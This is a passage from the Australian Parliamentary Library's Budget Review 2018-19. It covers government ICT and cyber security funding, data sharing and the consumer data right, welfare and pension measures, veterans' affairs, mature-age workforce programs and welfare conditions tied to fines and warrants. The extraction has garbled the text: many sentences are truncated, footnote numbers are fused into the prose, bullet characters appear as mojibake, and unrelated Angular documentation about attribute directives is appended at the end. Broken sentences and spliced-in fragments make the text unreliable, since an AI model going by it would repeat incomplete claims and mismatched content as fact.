Cyber security Following a reported cyber attack on the Bureau of Meteorology in December 2015, the 2017-18 Budget included an appropriation for a project to ‘improve the security and resilience of the Bureau of Meteorology’s … ICT systems and business processes’.712713 and being established as a statutory agency on 1 July 2018.714
Whole of government and cross-portfolio:
a key component in the further digital transformation of Government and supports the Government’s commitment to better and more accessible digital services.
Individuals will be able to prove their identity to a government agency or accredited non-government organisation, and then re-use this proven identity when accessing other government services.
In addition, with $0.7 million from within its existing resources, in 2018-19 the DTA will ‘investigate areas where blockchain technology could offer the most value for Government services’.715 The DTA will:
710..
711..
712. Australian Government, Budget measures: budget paper no. 2: 2017-18, p. 94; C Uhlmann, ‘China blamed for ‘massive’ cyber attack on Bureau of Meteorology computer’, ABC News website, 2 December 2015. 713. Department of the Prime Minister and Cabinet (PM&C), 2017 Independent Intelligence Review, PM&C, Canberra, June 2017, pp. 64-66; H Portillo-Castro, ‘Cyber policy’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library,
Canberra, 2018. 714..
Budget Review 2018-19 120. 716.717
Program-specific (various portfolios)’.718’.
715.16. Digital Transformation Agency (DTA), ‘Budget 2018-19.
717. N Horne and P Hamilton, ‘Data sharing and release’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018. 718. Australian Government, Agency resourcing: budget paper no. 4: 2018-19, pp. 6-7.
Budget Review 2018-19 121’.719
The Department of Home Affairs will be provided with $130.0 million in 2017-18 (including $94.0 million in capital funding) to improve the Department’s ICT capability, including to ‘upgrade the Department’s analytics and threat management capabilities.720
Monitoring ICT-related projects ICT-related measures in the 2018-19 Budget add to those announced in 2016, 2017 (including the $500 million Public Service Modernisation Fund), and older, ongoing projects.721
Despite the increasing number of ICT-related projects and contracts, there is still no consolidated source where Parliament and citizens can track the progress of ICT projects.722
In May 2017, the Government’s ICT Procurement Taskforce recommended ‘a public dashboard of significant ICT projects and spending that will allow the government and public to see the status and outcomes of its ICT investment decisions’.723 The Government did not accept the recommendation for a public-facing dashboard.724 In 2013 the Coalition had committed to emulating the example of the USA’s New South Wales, Queensland, and Victoria already have dashboards.726
The DTA monitors all digital and ICT initiatives with a budget of more than $10 million and not classified as Secret or Top Secret. The DTA’s first and only disclosure to date was six months ago at a Senate Estimates hearing.727 The DTA tabled a list of 17 projects, but the tabled document is not
found by search engines and is not available at any other location on the internet.728 The relevant DTA webpage, last updated in November 2017, does not list the 72 projects in scope for monitoring.729
Without a public, comprehensive source of updated information about specific projects, accountability for progress and spending is largely dependent on information gleaned from
719. For other decentralisation initiatives in the Budget, see: P Hamilton, ‘Public sector efficiencies, staffing, and administrative arrangements’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018. 720. For more on the Department of Home Affairs, see Hamilton, ‘Public sector efficiencies, staffing, and administrative arrangements’, op. cit. 721.. 722. P Hamilton, ‘Which governments have an online dashboard so the public can monitor ICT spending and projects?’, Flagpost, Parliamentary Library blog, 30 November 2017. 723. ICT Procurement Taskforce, Report of the ICT Procurement Taskforce, DTA, 2017, p. 7. 724. A Taylor (Assistant Minister for Cities and Digital Transformation), Government response to report of the ICT Procurement Government response, Ministerial statement, [September 2017]. 7’. 726. New South Wales Government, ‘digital.nsw: Digital government at a glance’; Queensland Government, ‘ICT dashboard’; Victorian Department of Premier and Cabinet, ‘Victorian Government ICT dashboard’. 727. Senate Finance and Public Administration Legislation Committee, Official committee Hansard, 15 November 2017, pp. 42-44. 728. Senate Finance and Public Administration Committee, Prime Minister and Cabinet Portfolio, Supplementary Budget Estimates 2017-18, ‘DTA, Information in relation to current projects undertaken by the Digital Transformation Agency’, tabled document. 729. DTA, ‘Oversight delivers early insights’, DTA website, 10 November 2017.
Budget Review 2018-19 122
irregular and narrowly targeted sources such as Australian National Audit Office performance audits and Senate Estimates hearings.730
730. For example: Australian National Audit Office (ANAO), Cybersecurity follow-up audit, Audit report, 42, 2016-17, ANAO, Canberra, 2017; ANAO, Unscheduled taxation system outages, Audit report, 29, 2017-18, ANAO, Canberra, 2018.
Budget Review 2018-19 123
Data sharing and release Nicholas Horne and Philip Hamilton
The 2018-19 Budget provides a total of $65.1 million over 2018-2022 for significant new data sharing and release arrangements.731 Agencies in the Prime Minister and Cabinet portfolio will account for $20.5 million of this funding ($15.4 million in additional funding and $5.1 million coming from agencies’ existing resources), and agencies within the Treasury portfolio will account for $44.6 million (all additional funding).732
The new data sharing and release arrangements will span:
⢠‘developing guidance on data sharing arrangements’
⢠‘monitoring and addressing risks and ethical considerations on data use’
⢠‘managing the process for high value datasets’, and
⢠the establishment of a new ‘national consumer data right’ (CDR) relating to the transfer of data between service providers in specified sectors.733
The first three of these elements will be the subject of legislation and will be the responsibility of a new entity to be established, the National Data Commissioner. Introduction of the new CDR will be via legislation—‘primarily through changes to the Competition and Consumer Act 2010 [Cth]’.734 The Government has stated that introduction of the CDR will start in the banking, energy and telecommunications sectors.735 Treasury portfolio agencies will have carriage of introducing the CDR as follows:
⢠the Australian Competition and Consumer Commission (ACCC) will assess the cost/benefit of ‘designating sectors that will be subject to the CDR’736 and will develop rules for CDR governance and data standards
⢠the Office of the Australian Information Commissioner (OAIC) will examine the privacy impact, and
⢠the Commonwealth Scientific and Industrial Research Organisation will finalise the data standards.737
The ACCC and OAIC will have responsibility for, respectively, oversight of the CDR system and consumer complaints concerning the CDR.738
The origin of the new data sharing and release arrangements lies in a 2017 Productivity Commission report on data availability and use. The Productivity Commission made a number of recommendations including a new legislative regime for data sharing and release, a
731. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget Measures 2018-19: Budget Paper No.2: 2018-19, pp. 166, 186. 732. Prime Minister and Cabinet portfolio agencies are the Departments of: the Prime Minister and Cabinet; Agriculture and Water Resources; Education and Training; Home Affairs; Industry, Innovation and Science; Health; Human Services; and Social
Services, with other portfolio agencies including the Australian Bureau of Statistics and the Australian Taxation Office. Treasury portfolio agencies are the Australian Competition and Consumer Commission, the Commonwealth Scientific and Industrial Research Organisation, and the Office of the Australian Information Commissioner. 733. Australian Government, Budget Measures 2018-19: Budget Paper No.2: 2018-19, op. cit., p. 186. 734. Department of the Prime Minister and Cabinet (DPMC), ‘Data availability and use: the Australian Government’s response to the Productivity Commission data availability and use inquiry: the consumer data right’, DPMC website. 735. Ibid. 736. Australian Government, Budget Measures 2018-19: Budget Paper No.2: 2018-19, op. cit., p. 186. 737. Ibid. 738. DPMC, ‘Data availability and use: the Australian Government’s response to the Productivity Commission data availability and use inquiry: the consumer data right’, op. cit.
Budget Review 2018-19 124
comprehensive right for consumers and small/medium businesses concerning data use, and a national data custodian to oversee the new data sharing and release arrangements.739
Shortly before the Budget, in its response to the Productivity Commission’s recommendations, the Government announced the creation of the new National Data Commissioner, new legislation governing data sharing and release, and the creation of the new CDR.740
Commentary on the new data sharing and release arrangements has emphasised the significance of the CDR as a ‘major regulatory change’ while raising doubts about existing federal government capability for its implementation.741
In its report the Productivity Commission outlined comparable data governance arrangements in New Zealand, the United Kingdom and the European Union, where a General Data Protection Regulation will come into effect on 25 May 2018.742
739. Productivity Commission, Data Availability and Use: Productivity Commission Inquiry Report No. 82, Productivity Commission, Canberra, March 2017, p. 2. 740. M Keenan (Minister for Human Services and Minister Assisting the Prime Minister for Digital Transformation), M Sukkar (Assistant Minister to the Treasurer), Government response to Productivity Commission inquiry into data availability and use,
media release, 1 May 2018; DPMC, ‘Data availability and use: the Australian Government’s response to the Productivity Commission data availability and use inquiry’, op. cit. 741. T Burton, ‘Canberra creates a brave new data world’, The Mandarin, 3 May 2018. 742. Productivity Commission, Data Availability and Use: Productivity Commission Inquiry Report No. 82, op. cit., pp. 498-507.
Budget Review 2018-19 125
Welfare expenditure: an overview Michael Klapdor
Social security and welfare expenditure in 2018-19 is estimated to total $176.0 billion, representing 36 per cent of the Australian Government’s total expenses.743 This administrative category of expenditure consists of a broad range of services and payments to individuals and families. It includes:
⢠most income support payments such as pensions and allowances (for example, the Age Pension and Newstart Allowance)
⢠family payments such as Family Tax Benefit and the new Child Care Subsidy
⢠Parental Leave Pay
⢠funding for aged care services
⢠the National Disability Insurance Scheme (NDIS) and
⢠payments and services for veterans and their dependants..744
Figure 1: estimated Australian Government expenses on social security and welfare, $m
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, pp. 6-23-6-27.
743. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, pp. 3-24, 6-23-6-27. 744. The majority of expenditure on these payments and services is provided through special appropriations rather than the annual Appropriation Bills.
Budget Review 2018-19 126
Key drivers of expenditure increases.745
Expenditure on payments for job-seekers (including Newstart Allowance and Youth Allowance (Other)) will increase slightly from $11.1 billion in 2017-18 to $11.9 billion in 2021-22.
A number of areas are expected to see a decline in expenditure:
⢠A decrease in the number of veterans and their dependants will result in a 17.5 per cent decrease in veterans’ community care and support expenditure in real terms from 2018-19 to 2021-22.
⢠Family Tax Benefit expenditure will decrease from $18.5 billion in 2017-18 to $17.9 billion in 2021-22 despite population growth—primarily as a result of policy measures to restrict eligibility and freeze the indexation of payment rates and income test thresholds.
⢠Parenting Payment expenses will decrease by 3.5 per cent in real terms from 2018-19 to 2021-22 as a result of enhanced compliance measures.
Parameter changes.
No increase in allowance payment rates Despite a concerted campaign from community groups, supported by key business lobby groups, the Government did not announce any budget measures to raise the level of support for those on Newstart Allowance or Youth Allowance.746 In fact, the Government will proceed with its proposal to close the Energy Supplement—a reduction in the level of assistance to new recipients of these allowance payments, and to new recipients of all income support payments.747 Media reports prior to the Budget suggested the Government would reverse this 2016-17 budget measure.748
745. Ibid., p. 6-23. 746. Australian Council of Social Service (ACOSS), ‘Raise the rate’, ACOSS website; T McIlroy, ‘Westacott dismisses MP’s talk of living on $40 a day’, Australian Financial Review, 4 May 2018, p. 6.
747. M Klapdor, ‘Power play: will the Energy Supplement be saved’, FlagPost, Parliamentary Library blog, 27 March 2018. 748. S Martin, ‘Treasurer to backflip on pension cut’, West Australian, 2 May 2018, p. 8.
Budget Review 2018-19 12749
749. Parliamentary Budget Office (PBO), ‘Appendix G: Costing documentation for the Greens’ election commitments’, Post-election report of election commitments, PBO, Canberra, 5 August 2016, p. 563.
Budget Review 2018-19 128
‘Finances for a longer life’ measures Lauren Cook and Don Arthur
The Government has announced three measures designed to help older Australians with their finances:
⢠new means testing rules for innovative retirement income streams
⢠increasing and extending the Pension Work Bonus and
⢠expanding the Pension Loans Scheme.
New means testing rules for innovative retirement income streams In July 2017, regulations took effect that enabled the development of new innovative lifetime retirement income stream products, including pooled lifetime retirement products.750 However, it was unclear how the means test rules for the Age Pension should apply to these new products. The means test for the Age Pension applies an income test and an asset test and whichever test results in the lower payment rate is applied.
In January 2018, the Australian Government sought stakeholder views on the proposed means test rules for lifetime retirement income streams. This included income testing 70 per cent of all product payments as income, and asset testing a consistent asset value of 70 per cent of the product purchase price until life expectancy at purchase, and 35 per cent for the rest of the person’s life.751 This proposed approach was a change from current rules that incorporate complicated capital reduction rules and deduction amounts in determining income and asset amounts for the purposes of means testing.752
In the Budget, the Australian Government announced new means testing rules for Age Pension recipients who purchase pooled lifetime retirement products after 1 July 2019.753 The new rules will assess a fixed 60 per cent of all pooled lifetime product payments as income, and 60 per cent of the purchase price of the product as assets until age 84, or a minimum of five years, and then 30 per cent for the rest of the person’s life.754
This measure is part of a package of measures designed to improve retirement income choices, including requiring superannuation fund trustees to develop a retirement income strategy, and requiring providers to simplify product disclosure statements for retirement income products.755 Peak body COTA Australia has welcomed these measures as a way to ‘improve the standard of living for older Australians’.756
The measure will cost $20.2 million over five years from 2017-18 as the rate of payment for Age Pension calculated under the new income and assets tests is likely to be higher for recipients with pooled lifetime retirement products. This measure will require legislation.
750. Treasury Laws Amendment (2017 Measures No. 1) Regulations 2017. 751. Department of Social Services (DSS), Means test rules for lifetime retirement income streams, Position paper, DSS, Canberra, 7 February 2018, p. 9. 752. Australian Government, ‘General provisions for assessing income streams’, Guide to social security law, DSS website,
11 May 2015. 753. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 175. 754. DSS, More Choices for a Longer Life—finances for a longer life, fact sheet, DSS, Canberra, May 2018. 755. Australian Government, op. cit., p. 185. 756. COTA Australia, Federal Budget 2018 —welcome commitment to better planning for an ageing population and aged care,
media release, 8 May 2018.
Budget Review 2018-19 129
Increasing and extending the Pension Work Bonus The Government is making changes to the Pension Work Bonus to allow pensioners to keep more of their earnings. These changes are expected to benefit around 88,750 social security pensioners, 1,000 allowees and around 3,000 Veterans’ Affairs pensioners.757 The Budget provides $227.4 million over the forward estimates.758 This measure will require legislation.
How the Pension Work Bonus currently works The Pension Work Bonus encourages pensioners to earn additional income through work. It is available to all pensioners over Age Pension age, including recipients of payments such as Disability Support Pension and Carer Payment.
The Pension Work Bonus works with the pension income test free area. With the free area a single pensioner can receive up to $168 in income per fortnight without it affecting their pension. The Pension Work Bonus enables a pensioner to earn an additional $250 per fortnight without losing pension income, but it operates differently from the income test free area.759
There are two important differences. First, while the income free area allows income from any source, only income from paid work as an employee counts for the Pension Work Bonus. It does not include income from self-employment or business income. Second, if a pensioner does not use their full Pension Work Bonus amount in a fortnight, they can bank the unused part up to a maximum of $6,500 and use it later. This is particularly useful for pensioners who undertake intermittent or seasonal work.760
Changes to the Pension Work Bonus This budget measure makes two changes to the Pension Work Bonus:
⢠the bonus amount will increase from $250 to $300 with the maximum accrual account rising to $7,800 and
⢠eligibility for the Pension Work Bonus will be expanded to include income from self-employment (with a ‘personal exertion test’ to exclude income associated with returns on investments).
Expansion of the Pension Loans Scheme The Pension Loans Scheme enables individuals over pension age to borrow against the equity they have in their family home or other real estate to obtain fortnightly payments. The loan can be repaid from the person’s estate after they die. The Government is expanding the scheme to allow more people to benefit and to increase the amount they can receive as an income stream.
Currently take up of the scheme has been low. In 2015 there were around 800 participants.761 The Department of Social Services expects around 6,000 people to take up a loan under the revised scheme over the next four years.762
This measure is expected to cost $11 million over the forward estimates. It will require changes to legislation.763
757. DSS, op. cit. 758. Australian Government, op. cit., p. 175. 759. DSS, ‘Work Bonus’, DSS website, last updated 14 September 2016. 760. Ibid. 761. Parliamentary Budget Office (PBO), ‘‘Costing outside the caretaker period’, (pension Loans Scheme), PBO, Canberra,
12 October 2015. 762. DSS, More Choices for a Longer Life—finances for a longer life, fact sheet, DSS, Canberra, May 2018. 763. Ibid.
Budget Review 2018-19 130
How the Pension Loans Scheme currently works The Pension Loans Scheme is a reverse mortgage scheme that allows people of pension age to access an income stream by borrowing against their housing equity.
The Pension Loans Scheme allows people to top up a part pension to the full rate or, for those not eligible for any pension, receive fortnightly payments equivalent to the full rate. It is open to people of pension age (or their partners) who have equity in Australian real estate that they can use as security for the loan. To be eligible the person or their partner must receive no pension or a reduced rate of pension due to the income or assets test (but not both). It is not available to those receiving the full rate of pension. Compound interest is charged on the loan and it is normally repaid if the home is sold or repaid from the person’s estate after their death.764
The Government charges compound interest of 5.25 per cent on the outstanding loan balance.765
Changes to the Pension Loans Scheme This measure expands eligibility for the Pension Loans Scheme to all Australians of Age Pension age, including people receiving the full rate of the pension and to self-funded retirees. It also increases the amount individuals can receive as an income stream to 150 per cent of the Age Pension rate.
Stakeholder reactions and media commentary Reactions to these budget measures have been mixed with some stakeholders and commentators expressing scepticism about the benefits for older people while others have reacted more positively.
The Combined Pensioners and Superannuants Association (CPSA) labelled the Budget a ‘fizzer’, arguing that the Pension Work Bonus and Pension Loans Scheme measures are minor.766
Ben Oquist of the Australia Institute praised changes to the Pension Loans Scheme as ‘sensible economic reform’ that could ‘make a real difference to people’s lives’.767 Newspaper commentator Daryl Dixon was also positive about changes to the scheme, noting that the 5.25 per cent compound interest rate was below the rates charged for commercial reverse mortgages.768
In the West Australian, Nick Bruining and Neale Prior were less enthusiastic about the Pension Loans Scheme noting that there are no limits on the Minister for Social Services’ power to increase the interest rate.769
764. Department of Social Services (DSS), ‘Pension Loans Scheme’, DSS website, last updated 29 January 2016. 765. Department of Human Services (DHS), ‘Pension Loans Scheme costs and interest rates’, DHS website, last updated 6 February 2018. 766. Combined Pensioners and Superannuants Association (CPSA), Budget 2018 a fizzer for older Australians, media release, 8 May
2018.
767. The Australia Institute, Evidence backing Scott Morrison plan to expand Pension Loan Scheme, media release, 8 May 2018. 768. D Dixon, ‘Loan scheme extension is great news’, The Canberra Times, 13 May 2018. 769. N Prior and N Bruining, ‘New loan scheme numbers not so attractive’, The West Australian, 14 May 2018.
Budget Review 2018-19 131
Veterans’ Affairs M.770
The only significant new savings measure for the portfolio is a package of changes to dental and allied health services which is expected to deliver $40.7 million in savings over four years from 2018-19.771 The package includes changes to fee schedules to align with industry standards, changing the ‘treatment cycle’ for general practitioner (GP) referrals to allied health services so that they are valid for 12 sessions rather than 12 months, and trialling new funding models.772 DVA intends to further review allied health fee schedules from 2021.773
Veteran Centric Reform Program.774
The new budget allocation will provide for the second stage of the program: updating the 13 IT systems supporting the delivery of income support payments (such as the Service Pension) and other systems supporting the delivery of compensation (such as incapacity and permanent impairment payments).775 The additional funding will also be used to implement:
⢠a single phone number, 1800VETERAN, for access to DVA services
⢠outreach programs to veterans and their families who are not in contact with DVA
⢠measures to use ‘the power of data’ to anticipate the needs of veterans and their families and then offer them relevant services and support and
⢠increased choice of aids and appliances. 776
A 2016 Senate Foreign Affairs, Defence and Trade Committee inquiry into the mental health of serving ADF members and veterans set out a range of problems with DVA’s processes and service
770. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, p. 6-24. 771. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 190-193. 772. Department of Veterans’ Affairs (DVA), Improved dental and allied health, factsheet, DVA, Canberra, 2018, pp. 1-3. 773. Ibid., p. 2. 774. Senate Foreign Affairs, Defence and Trade Committee, Answers to Questions on Notice, Veterans’ Affairs Portfolio, Additional
Budget Estimates 2017-18, Question 58. 775. Ibid. 776. DVA, Delivering Australia’s digital future—Veteran Centric Reform—continuation, factsheet, DVA, Canberra, 2018, p. 1.
Budget Review 2018-19 132
delivery.777 The Committee’s main recommendation to address these issues was adequate funding to update DVA’s IT systems.778 The Australian Public Service Commission also raised serious concerns with DVA’s service delivery models and claims processing in a 2013 capability review.779).780 Both the ANAO and the Productivity Commission reviews were recommendations of a 2017 Senate committee inquiry into suicide by veterans.781
Mental health treatment for reservists The 2017-18 Budget included a measure to provide access to DVA-funded mental health treatments to all current and former ADF members for any recognised mental health condition— without the need to demonstrate that the condition is linked to their service.782.783 It will commence on 1 July 2018 and will not require legislation.
Increased payments for veterans undertaking study).784 DVA has raised concerns that this reduction in payments
777. Senate Foreign Affairs, Defence and Trade References Committee, Mental health of Australian Defence Force members and veterans, The Senate, Canberra, March 2016, pp. 102-14. 778. Ibid., p. 116. 779. Australian Public Service Commission (APSC), Capability review: Department of Veterans’ Affairs, APSC, Canberra,
5 December 2014. 780. Australian National Audit Office (ANAO), ‘Efficiency of veterans service delivery by the Department of Veterans’ Affairs’, ANAO website; Productivity Commission (PC), ‘Compensation and rehabilitation for veterans’, PC website. 781. Senate Foreign Affairs, Defence and Trade References Committee, The constant battle: suicide by veterans, The Senate,
Canberra, August 2017, pp. 69, 100. 782. M Klapdor, ‘Veterans’ Affairs’, Budget review 2017-18, Research paper series, 2016-17, Parliamentary Library, Canberra, May 2017. 783. DVA, Mental health treatment for Australian Defence Force reservists with disaster relief and certain other service, factsheet,
DVA, May 2018. 784. DVA, ‘7.7 Person has been incapacitated for a cumulative period exceeding 45 weeks’, Military Compensation MRCA Manuals and Resources Library, DVA website, last amended 10 August 2017.
Budget Review 2018-19 133
may result in recipients making short-term decisions about employment ‘at the expense of effective rehabilitation outcomes’.785.
Continuing employment programs.786.787
785. DVA, ‘Support for veterans through improved compensation arrangements—removing the stepdown for incapacity payments—increased payments for veterans studying’, factsheet, DVA, May 2018. 786. DVA, ‘Support for veterans’ employment opportunities—continuation’, factsheet, DVA, May 2018; Australian Government, ‘Industry Advisory Committee on Veterans’ Employment’, Prime Minister’s Veterans’ Employment Program website, n.d. 787. DVA, ‘Support for veterans’ employment opportunities—continuation’, op. cit.
Budget Review 2018-19 134
Workforce participation measures Dr Matthew Thomas and Geoff Gilfillan
In keeping with the broader emphasis on older Australians in this year’s Budget, much of the funding for employment participation measures is directed towards supporting mature age job seekers to remain in or re-enter the workforce. Mature age job seekers are defined as those aged 45 years and older.
Mature age labour force participation As Graph 1 indicates, labour force participation for men aged 45 to 54 years has remained strong and stable over the past 40 years, only falling slightly from around 92.5 per cent in March 1978 to 88.2 per cent in March 2018.788 Over the same time interval, the labour force participation of women of the same age has risen significantly, from 46.6 per cent to 80.2 per cent.
Graph 1: labour force participation, 45 to 54 years
Source: Australian Bureau of Statistics (ABS), Labour Force, Australia, detailed-electronic delivery, cat. no. 6291.0.55.001, ABS, March 2018.
The rate of labour force participation for men aged 55 to 64 years fell steadily from around 75 per cent in the late 1970s to around 60 per cent in the mid-1980s, as indicated in Graph 2, and remained at about this level for the next 20 years. The rate steadily increased from 60.3 per cent in March 2000 to 73.6 per cent in March 2018. Labour force participation for women aged 55 to 64 years stood at around 20 per cent from the late 1970s to the mid-1980s, but has been rising steadily to around 59.9 per cent in March 2018. The labour force participation rate for all people
788. Under the Australian Bureau of Statistics’ definition of employment, which aligns closely with international standards and guidelines, employed persons are those aged 15 years or over who, during the reference week, worked for one hour or more for pay, profit, commission or payment in-kind, in a job or business or on a farm (employees and owner managers), or worked for one hour or more without pay in a family business or on a farm (contributing family workers), or had a job, business or farm, but were temporarily not at work. Australian Bureau of Statistics (ABS), Labour statistics: concepts, sources and methods, cat. no. 6102.0.55.001, ABS, February 2018.
Budget Review 2018-19 135
aged 55 to 64 years was exactly two-thirds (66.6 per cent) in March 2018, which compares with 47.9 per cent in March 2000.
Graph 2: labour force participation, 55 to 64 years
Source: Australian Bureau of Statistics (ABS), Labour Force, Australia, detailed-electronic delivery, cat. no. 6291.0.55.001, ABS, March 2018.
The labour force participation rate for both men and women aged 65 years and older started to accelerate from around 2004. The rate for men aged 65 years plus increased from 10.1 per cent in March 2004 to 17.6 per cent in March 2018, while the rate for women of the same age increased from 3.3 per cent to 10.3 per cent. The labour force participation rate for all people aged 65 years plus more than doubled from 6.2 per cent to 13.7 per cent during the same interval.
Increasing the labour force participation of older Australians In the case of older Australians (55 years and older), labour force participation has increased significantly as a result of a number of factors. These are likely to include:
⢠the generally improved health of older Australians
⢠the availability of more flexible and less physically demanding forms of employment which have been used by some older Australians to transition to retirement
⢠the extended period of economic growth in Australia from the mid-1990s to the global financial crisis (GFC) of mid-2007 to 2009 which created job opportunities for older people and
⢠decisions to remain in employment longer which have been influenced by the combination of a slowing in growth of superannuation balances following the impact of the GFC and various measures introduced by successive governments to increase older worker retention, such as the increase in the age at which people are eligible for the Age Pension.789
Despite the substantial increase in participation, Australia is on some estimates still only a mid-table performer where it comes to the employment of older people compared with other OECD
789. See Australian Law Reform Commission (ALRC), Access all ages—older workers and Commonwealth laws, ALRC Report 120, ALRC, Sydney, 2013, pp. 55-56.
Budget Review 2018-19 136
countries.790 There is also evidence that many older Australians who would like to work are unable to do so, whether for reasons of age discrimination or a lack of relevant skills.791 Older people who become unemployed tend to experience greater difficulty than younger people in gaining
subsequent employment.792
The Budget provides funding for a range of measures aimed at improving the labour force participation of mature age people. These include:
⢠$136.4 million over four years for training to assist job seekers aged 45 years and over with tailored career assistance and the development of information and communications technology (ICT) skills
⢠$19.3 million over three years for matched suitable training funding of up to $2,000 for workers aged 45 to 70 years who seek to stay in the workforce longer
⢠$15.2 million over three years to assist mature age workers who are likely to be retrenched or leave the workforce to remain employed or find a new job
⢠$17.7 million over four years towards Entrepreneurship Facilitators who will assist older Australians at risk of unemployment to become self-employed793 and
⢠$17.4 million over four years to establish the Skills Checkpoint for Older Workers program, which will provide employees aged 45 to 70 with guidance on transitioning into new roles within their current industry or pathways to a new career.794
The Government has also indicated that it intends to ‘establish a collaborative partnership with the Age Discrimination Commissioner, business peak bodies, universities and other experts to encourage employers to create more mature age friendly workplaces and reduce age discrimination’.795
Comment The Skills Checkpoint for Older Workers program is based on a pilot which ran from December 2015 to May 2016. The pilot was delivered in three locations by select members of the Australian Apprenticeship Support Network (AASN), and had 1,067 participants. The findings of an evaluation of the pilot undertaken concurrent with its delivery were generally positive, and some of its recommendations, such as raising the upper participation age beyond 54 years, have been adopted. It was a recommendation of the Australian Human Rights Commission’s national inquiry into employment discrimination against older Australians and Australians with disability that the program be rolled out across Australia.796
It should be noted that much of the funding for the above measures is not new; many of the measures have been partially funded from existing Department of Jobs and Small Business resources.
790. PwC, Golden Age Index: how well are OECD economies harnessing the power of an older workforce?, 2016. For more detailed data on ageing and employment in Australia and other OECD countries, see the Organisation for Economic Co-operation and Development (OECD), ‘Ageing and employment policies’, OECD website.
791. Australian Human Rights Commission, Willing to work: national inquiry into employment discrimination against older Australians and Australians with disability, Australian Human Rights Commission, Sydney, 2016. 792. Ibid., p. 11. 793. Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018, p. 157. 794. Ibid., p. 91. 795. Department of Jobs and Small Business, ‘2018-19 Budget Jobs and Small Business overview’, Department of Jobs and Small
Business website. 796. Australian Human Rights Commission, op. cit., p. 17.
Budget Review 2018-19 137
Other workforce participation measures While a majority of the funding for workforce participation measures in this year’s Budget is directed at mature age job seekers and workers, there is also funding for:
⢠an online employment services trial for the most job-ready job seekers ($12.2 million over three years)797
⢠a trial of localised approaches to delivering employment services in ten disadvantaged regions ($18.4 million over three years)798
⢠assistance to ensure continuity of service in the transition to a new funding model for Disability Employment Services ($9.9 million over two years) and
⢠the extension of the Transition to Work program which provides intensive, pre-employment support to early school leavers aged 15 to 21 years to improve their work readiness and help them into work or education ($89.0 million over four years).799
It should be noted that, once again, much of the funding for these measures has been derived from existing resources. While the budget papers state that an additional $89.0 million has been allocated towards the Transition to Work program it is not clear how this reconciles with the figures in the financial table at page 160 of Budget Paper no. 2, which indicate a reduction in funding over the forward estimates.
None of the above measures will require legislation.
797. Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018, p. 158. 798. Ibid., p. 159. 799. Ibid., pp. 160-161.
Budget Review 2018-19 138
Extending mutual obligation—court-ordered fines and arrest warrants Don Arthur
According to the original principle of mutual obligation, recipients of unemployment payments have obligations to search for work, take advantage of opportunities to improve their employability, and to work in return for income support.800 Recipients who fail to meet their obligations can have their payments suspended or cancelled.8.802
These measures are subject to the passage of legislation.803.804
The measures Under the ‘Encouraging lawful behaviour of income support recipients’ measures, the Australian Government will work with states and territories to ensure people on income support pay fines and clear outstanding arrest warrants.805.806
Arrest warrants According to a DSS fact sheet: ‘From 1 March 2019, people receiving welfare payments with outstanding arrest warrants for indictable criminal offences will have their payment suspended or reduced by half if they have dependent children.’807
Recipients who clear their warrants within four weeks will have their payments reinstated from the date the warrant was cleared. Recipients who fail to clear their warrants within four weeks will have their payments cancelled.808
800. D Kemp (Minister for Employment, Education, Training and Youth Affairs), Unemployed young people to take responsibility for their future, media release, 28 January 1998. 801. Department of Human Services (DHS), ‘Mutual obligation requirements’, DHS website. 802.. 803. DHS, Encouraging Lawful Behaviour of Income Support Recipients [May 2018]. 804. N Bita, ‘Cop it sweet for dole’, Courier Mail, 10 May 2018, p. 1. 805. Department of Social Services (DSS), Encouraging lawful behaviour of income support recipients, fact sheet, DSS, Canberra, May 2018. 806. Ibid., p. 2. 807. Ibid. 808. Ibid.
Budget Review 2018-19 139
People who make a new claim or transfer between payments from 1 March 2019 will be required to provide information about any outstanding arrest warrants and agree to police checks. If they have an outstanding warrant and fail to clear it within seven days, their claim will be rejected.809).810
Court-imposed fines.811
Issues International experience Similar requirements have been imposed in New Zealand, the United States (US) and the Canadian province of British Columbia.812
The US Social Security Administration experienced some difficulty obtaining and processing state government data.813 It faced a number of lawsuits and responded by changing the way it administers the program. Congress is currently considering new legislation.814
Implementation has been more straightforward in New Zealand. Most recipients have their warrant cleared without a benefit suspension or reduction.815 Unlike the US and Australia, New Zealand has only one level of government.
Court-imposed fines and vulnerable recipients The National Social Security Rights Network and the Australian Council of Social Service argue that the court-imposed fines measure could push some vulnerable income support recipients into
809. Ibid. 810. LexisNexis, Encyclopaedic Australian Legal Dictionary 811. Department of Social Services (DSS), op. cit. 812.. 813. US General Accounting Office (GAO), Social Security Administration: Fugitive Felon Program could benefit from better use of technology, US GAO, Washington, 2002. 814. United States, Republican Policy Committee (RPC), ‘HR 2792, the Control Unlawful Fugitive Felons Act of 2017’, RPC website. 815. New Zealand, Privacy Commissioner, ‘Justice/MSD Warrants to Arrest Programme’, Privacy Commissioner website.
Budget Review 2018-19 140
homelessness.816.817 Indigenous people are also disproportionately affected by fines.818 The National Aboriginal and Torres Strait Islander Legal Services (NATSILS) and the National Congress of Australia’s First Peoples have expressed concern about this measure.819
This suggests that if governments are going to work together to deal with the problem of offending by income support recipients, they could look at the problem more broadly and consider a wider range of options.
816. C Knaus, ‘Coalition's “brutal” plan to dock welfare for fines savaged by advocates’, The Guardian, 9 May 2018. 817. NSW SentencingCouncil, The effectiveness of fines as a sentencing option: court-imposed fines and penalty notices: interim report, 2006, p. 29. Include full title in link 818. M Spiers Williams and R Gilbert, ‘Reducing the unintended impacts of fines’, Current Initiatives Paper 2, January 2011. 8, 9 May 2018.
Budget Review 2018-19 141’s Central Enquiry Point for referral. | https://parlinfo.aph.gov.au/parlInfo/search/display/display.w3p;query=Id:%22library/prspub/5982057%22;src1=sm1 | CC-MAIN-2018-43 | en | refinedweb |
An Attribute directive changes the appearance or behavior of a DOM element.
Try the .
There are three kinds of directives in Angular:
Components are the most common of the three directives. You saw a component for the first time in the QuickStart guide.
